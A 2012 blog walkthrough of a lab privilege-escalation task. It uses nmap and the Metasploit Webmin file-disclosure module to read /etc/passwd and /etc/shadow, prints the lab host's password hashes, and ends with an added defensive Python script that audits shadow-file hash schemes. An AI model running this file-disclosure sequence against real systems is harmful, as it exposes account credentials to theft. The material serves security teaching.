Thursday, 09 February 2012

Privilege escalation

The basic rules we must follow when hacking are:

  1. Information Gathering
  2. Service Enumeration
  3. Vulnerability Assessment
  4. Exploit
On Saturday, 04 February 2012, we had the task of performing a privilege escalation on the computer 192.168.0.21. The most important point is that we only had 10 minutes.
The first step is information gathering. Use nmap to gather information about which services are running on the target.
root@bt:~# nmap -sV 192.168.0.21
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-02-04 18:06 WIT
Nmap scan report for 192.168.0.21
Host is up (0.0016s latency).
Not shown: 995 closed ports
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
80/tcp    open  http        Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
139/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
445/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
10000/tcp open  http        MiniServ 0.01 (Webmin httpd)
MAC Address: 08:00:27:F9:C1:BB (Cadmus Computer Systems)
Service Info: OS: Linux; CPE: cpe:/o:linux:kernel
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.51 seconds
From the output above we notice something unusual on port 10000, with the clue Webmin httpd. With that information we go straight to Metasploit to look for a module we might be able to use.
msf > search webmin
Matching Modules
================
   Name                                    Disclosure Date  Rank    Description
   ----                                    ---------------  ----    -----------
   auxiliary/admin/webmin/file_disclosure  2006-06-30       normal  Webmin file disclosure
msf > use auxiliary/admin/webmin/file_disclosure 
msf  auxiliary(file_disclosure) > set rhost 192.168.0.21
rhost => 192.168.0.21
msf  auxiliary(file_disclosure) > exploit
[*] Attempting to retrieve /etc/passwd...
[*] The server returned: 200 Document follows
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
dhcp:x:100:101::/nonexistent:/bin/false
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash
obama:x:1001:1001::/home/obama:/bin/bash
osama:x:1002:1002::/home/osama:/bin/bash
yomama:x:1003:1003::/home/yomama:/bin/bash
[*] Auxiliary module execution completed
msf  auxiliary(file_disclosure) > ls
[*] exec: ls

0bf3a6a5724cf0b0499ca7e73ac252ae.rtf
404606_2784683289646_1035152752_32311634_134946266_n.jpg
builder32-2
c16547b957eb2413ec509c66343cd7cb.rtf
Desktop
ed3691697b313fbb1bdf495b7fb1c9a3.rtf
meterpreter.pdf
VirtualBox VMs
Oops... something is wrong, why doesn't the password appear? OK, let's look at the options by typing show options.
msf  auxiliary(file_disclosure) > show options

Module options (auxiliary/admin/webmin/file_disclosure):

   Name     Current Setting   Required  Description
   ----     ---------------   --------  -----------
   DIR      /unauthenticated  yes       Webmin directory path
   Proxies                    no        Use a proxy chain
   RHOST    192.168.0.21      yes       The target address
   RPATH    /etc/passwd       yes       The file to download
   RPORT    10000             yes       The target port
   VHOST                      no        HTTP server virtual host

msf  auxiliary(file_disclosure) > set rpath /etc/shadow/
rpath => /etc/shadow/
msf  auxiliary(file_disclosure) > exploit

[*] Attempting to retrieve /etc/shadow/...
[*] The server returned: 200 Document follows
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
daemon:*:14040:0:99999:7:::
bin:*:14040:0:99999:7:::
sys:*:14040:0:99999:7:::
sync:*:14040:0:99999:7:::
games:*:14040:0:99999:7:::
man:*:14040:0:99999:7:::
lp:*:14040:0:99999:7:::
mail:*:14040:0:99999:7:::
news:*:14040:0:99999:7:::
uucp:*:14040:0:99999:7:::
proxy:*:14040:0:99999:7:::
www-data:*:14040:0:99999:7:::
backup:*:14040:0:99999:7:::
list:*:14040:0:99999:7:::
irc:*:14040:0:99999:7:::
gnats:*:14040:0:99999:7:::
nobody:*:14040:0:99999:7:::
dhcp:!:14040:0:99999:7:::
syslog:!:14040:0:99999:7:::
klog:!:14040:0:99999:7:::
mysql:!:14040:0:99999:7:::
sshd:!:14040:0:99999:7:::
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::
[*] Auxiliary module execution completed
msf  auxiliary(file_disclosure) > ls
[*] exec: ls

0bf3a6a5724cf0b0499ca7e73ac252ae.rtf
404606_2784683289646_1035152752_32311634_134946266_n.jpg
builder32-2
c16547b957eb2413ec509c66343cd7cb.rtf
Desktop
ed3691697b313fbb1bdf495b7fb1c9a3.rtf
meterpreter.pdf
VirtualBox VMs
Bingo: we get the list of password hashes and the user names (root, obama, etc.). That's all done.
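As an added example (not from the post), here is a small Python audit of the /etc/shadow format shown above: it separates locked accounts from ones with usable password hashes and flags the legacy $1$ MD5-crypt scheme that this target uses, which is the finding a defender would want from such an exposure. The sample lines are constructed, not the post's real data.

```python
import re

# Constructed sample lines in /etc/shadow format (not the post's real data):
# one MD5-crypt ($1$) hash, one SHA-512-crypt ($6$) hash, and two locked accounts.
SAMPLE_SHADOW = """\
root:$1$saltsalt$abcdefghijklmnopqrstuv:14041:0:99999:7:::
daemon:*:14040:0:99999:7:::
sshd:!:14040:0:99999:7:::
alice:$6$rounds=5000$saltsaltsaltsalt$abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmn:14041:0:99999:7:::
"""

# crypt(3) scheme identifiers; $1$ (MD5-crypt) is the weak legacy scheme seen in the post.
HASH_SCHEMES = {"1": "md5crypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
                "5": "sha256crypt", "6": "sha512crypt", "7": "scrypt", "y": "yescrypt"}
WEAK_SCHEMES = {"md5crypt", "descrypt"}

def classify_shadow_line(line):
    """Return (user, status, scheme) for one shadow entry, or None if malformed."""
    fields = line.rstrip("\n").split(":")
    if len(fields) < 2 or not fields[0]:
        return None
    user, pw = fields[0], fields[1]
    if pw == "":
        return (user, "empty-password", None)   # passwordless login: worst case
    if pw.startswith(("!", "*")):
        return (user, "locked", None)           # no usable hash, cannot log in by password
    m = re.match(r"^\$([^$]+)\$", pw)
    # No "$id$" prefix means traditional DES crypt, which is also weak.
    scheme = HASH_SCHEMES.get(m.group(1), "unknown") if m else "descrypt"
    status = "weak-hash" if scheme in WEAK_SCHEMES else "hashed"
    return (user, status, scheme)

def audit_shadow(text):
    """Summarize which accounts have usable password hashes and which use weak schemes."""
    report = {"weak": [], "hashed": [], "locked": [], "empty": []}
    for line in text.splitlines():
        result = classify_shadow_line(line)
        if result is None:
            continue
        user, status, scheme = result
        if status == "weak-hash":
            report["weak"].append((user, scheme))
        elif status == "hashed":
            report["hashed"].append((user, scheme))
        elif status == "locked":
            report["locked"].append(user)
        else:
            report["empty"].append(user)
    return report
```

Run against a real shadow dump, every account in the "weak" or "empty" list is one whose password should be reset under a modern scheme (sha512crypt or yescrypt) regardless of whether the file itself has leaked.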